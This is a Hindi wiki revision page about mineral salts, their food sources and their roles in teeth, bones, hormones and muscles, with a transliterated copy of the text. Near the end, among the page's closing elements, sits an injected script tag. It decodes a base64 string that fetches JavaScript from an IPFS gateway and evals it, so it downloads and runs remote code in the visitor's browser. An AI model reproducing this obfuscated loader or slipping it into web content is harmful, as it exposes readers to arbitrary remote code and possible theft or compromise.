Difference between revisions of "खनिज लवण"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(8 intermediate revisions by 5 users not shown)
Line 1: Line 1:
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Minerals Salt) खनिज लवण शरीर की जैविक क्रियाओं के संचालन के लिए आवश्यक होते हैं। दूध, पनीर, अण्डा, मछली, [[भारत के फल|फल]], हरी पत्तेदार [[भारत की शाक-सब्ज़ी|सब्जियाँ]] खनिज लवणों का प्रमुख स्रोत हैं।
+
'''खनिज लवण''' ([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Minerals Salt) शरीर की जैविक क्रियाओं के संचालन के लिए आवश्यक होते हैं। [[दूध]], पनीर, अण्डा, [[मछली]], [[भारत के फल|फल]], हरी पत्तेदार [[भारत की शाक-सब्ज़ी|सब्जियाँ]] खनिज लवणों का प्रमुख स्रोत हैं।
;<u>खनिज लवणों की उपयोगिता</u>
+
;खनिज लवणों की उपयोगिता
[[कैल्शियम]] (Ca) तथा [[फास्फोरस]] (P) दाँतों तथा हड्डियों के निर्माण में भाग लेते हैं। [[इंसुलिन]], थायराक्सिन, थायमिन, हीमोग्लोबिन आदि का निर्माण खनिज लवणों के योग से होता है। ये विभिन्न अंगों, जैसे—[[ह्रदय]] तथा माँसपेशियों को क्रियाशील रखते हैं।  
+
[[कैल्शियम]] (Ca) तथा [[फास्फोरस]] (P) [[दाँत|दाँतों]] तथा हड्डियों के निर्माण में भाग लेते हैं। [[इंसुलिन]], थॉयरॉक्सिन, थायमिन, [[हीमोग्लोबिन]] आदि का निर्माण खनिज लवणों के योग से होता है। ये विभिन्न अंगों, जैसे - [[हृदय]] तथा [[माँसपेशियाँ|माँसपेशियों]] को क्रियाशील रखते हैं।  
  
 
{{लेख प्रगति
 
{{लेख प्रगति
Line 10: Line 10:
 
|शोध=
 
|शोध=
 
}}
 
}}
 
+
==संबंधित लेख==
[[Category:नया पन्ना]]
+
{{रसायन विज्ञान}}
 
[[Category:रसायन_विज्ञान]]
 
[[Category:रसायन_विज्ञान]]
 
[[Category:विज्ञान कोश]]
 
[[Category:विज्ञान कोश]]
 +
[[Category:खनिज लवण]]
 +
[[Category:पोषण]]
 
__INDEX__
 
__INDEX__

Latest revision as of 09:05, 13 December 2014

khanij lavan (aangrezi:Minerals Salt) sharir ki jaivik kriyaoan ke sanchalan ke lie avashyak hote haian. doodh, panir, anda, machhali, phal, hari pattedar sabjiyaan khanij lavanoan ka pramukh srot haian.

khanij lavanoan ki upayogita

kailshiyam (Ca) tatha phasphoras (P) daantoan tatha haddiyoan ke nirman mean bhag lete haian. iansulin, th aauyar aauksin, thayamin, himoglobin adi ka nirman khanij lavanoan ke yog se hota hai. ye vibhinn aangoan, jaise - hriday tatha maansapeshiyoan ko kriyashil rakhate haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh